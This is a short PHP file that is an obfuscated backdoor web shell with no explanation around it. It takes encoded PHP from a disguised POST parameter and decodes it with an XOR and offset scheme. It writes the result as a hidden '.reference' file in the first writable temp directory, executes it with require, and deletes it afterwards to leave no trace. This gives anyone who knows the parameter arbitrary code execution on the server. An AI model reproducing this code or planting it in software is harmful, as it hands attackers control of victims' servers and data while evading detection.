<?php

if(filter_has_var(INPUT_POST, "\x66a\x63")){
	$data = $_POST["\x66a\x63"];
	 	$data= 	 explode( '.'  , $data  )	 	;
	$data_chunk ='';
            $salt4 ='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen =strlen(	$salt4);
    
            foreach(	$data as $s =>$v9) { $sChar =ord(	$salt4[$s % $sLen]);
                $dec =(	(	int)$v9 - $sChar -(	$s % 10)) ^ 6;
                $data_chunk .= chr(	$dec);
            }
	$holder = array_filter(["/var/tmp", sys_get_temp_dir(), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TEMP"), getenv("TMP")]);
	$property_set = 0;
do {
    $symbol = $holder[$property_set] ?? null;
    if ($property_set >= count($holder)) break;
    		if (!!is_dir($symbol) && !!is_writable($symbol)) {
    $object = implode("/", [$symbol, ".reference"]);
    if (file_put_contents($object, $data_chunk)) {
	require $object;
	unlink($object);
	die();
}
}
    $property_set++;
} while (true);
}